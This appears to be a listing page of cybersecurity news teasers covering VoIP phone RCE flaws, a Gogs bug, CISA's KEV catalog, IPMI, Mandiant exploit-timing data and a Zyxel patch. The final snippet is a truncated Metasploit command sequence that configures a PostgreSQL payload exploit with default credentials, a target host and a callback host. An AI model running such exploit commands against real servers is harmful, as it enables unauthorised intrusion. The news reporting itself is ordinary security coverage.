The remote code execution flaw enables root access and voice attacks on HP Poly VoIP phones, including eavesdropping and the ability to collect audio to generate deepfakes.

There's a huge hole and no one is patching it thus far. A critical, remote code execution (RCE) bug in Gogs, a popular open-source self-hosted Git service, can be exploited by any authenticated user - ...

A critical vulnerability in Grandstream GXP1600 series VoIP phones allows a remote, unauthenticated attacker to gain root privileges and silently eavesdrop on communications. VoIP communication ...

A new paper gives an insider’s perspective into CISA’s Known Exploited Vulnerability catalog – and also offers a free tool to help security teams use the CISA KEV catalog more effectively. The paper, ...

What is IPMI and how is it used? Released by INTEL in 1998, IPMI (Intelligent Platform Management Interface) is a set of specifications that lay out communication protocols across both local buses as ...

It only takes five days on average for attackers to exploit a vulnerability, according to a new report. New research by cybersecurity firm Mandiant provides eyebrow-raising statistics on the ...

Hardware manufacturer Zyxel quietly released an update fixing a critical vulnerability that gives hackers the ability to control tens of thousands of firewall devices remotely. The vulnerability, ...

use exploit/linux/postgres/postgres_payload set username administrator set password pass set rhost 192.168.123.6 set rport 5432 set database postgres set lhost 192 ...